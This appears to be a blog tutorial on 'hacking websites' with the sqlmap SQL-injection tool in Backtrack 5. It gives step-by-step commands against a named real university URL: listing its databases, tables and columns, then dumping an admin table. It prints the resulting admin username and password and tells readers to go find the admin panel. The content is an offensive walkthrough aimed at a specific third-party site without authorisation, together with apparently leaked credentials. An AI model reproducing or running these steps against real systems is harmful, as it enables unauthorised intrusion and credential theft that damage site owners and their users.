In my previous tutorial I have explained what is backtrack, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.
Sqlmap is developed in Python and it is available with Backtrack 5 and
Backtrack 5 R1 and all versions of Backtrak, Otherwise you can download
seperately also from
$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
Sqlmap is is best sql injection tool.
With sqlmap we can know the database name and type of database i.e,Mysql
or SqlServer or ........ and we can find the database name and tables
related to that database and we can dump the data from the database.
It is totally a database takeover tool
Steps:
1.First we require the vulnerable target and here it is
http://www.hu.edu.pk/viewfaculty.php?id=12
2.Go to Backtrack and type cd /pentest/database/sqlmap
3.Run the sqlmap
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12
-u is the vulnerable url
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs
or
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db
if you write as --dbs then it will fetch all the databases in the server
and if you write --current-db then it will fetch only the database related to the current website
we will get the database name
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables
Here after -D we have to give the database name
--tables means we are trying to fetch the tables in the current database
and we will get the table names
after that we have to fetch only the table information which we required
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns
we will get the names of columns in that table with datatype
./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name --dump
now we will get the total information in the table "admin"
After finishing all the process you r having
Database Name : c3results
No of tables :48
Admin Table Name : admin
admin username : 123_admin_123
admin password : 123_hazara_123
tehn, all you need to do is to find the admin panel.
No comments:
Post a Comment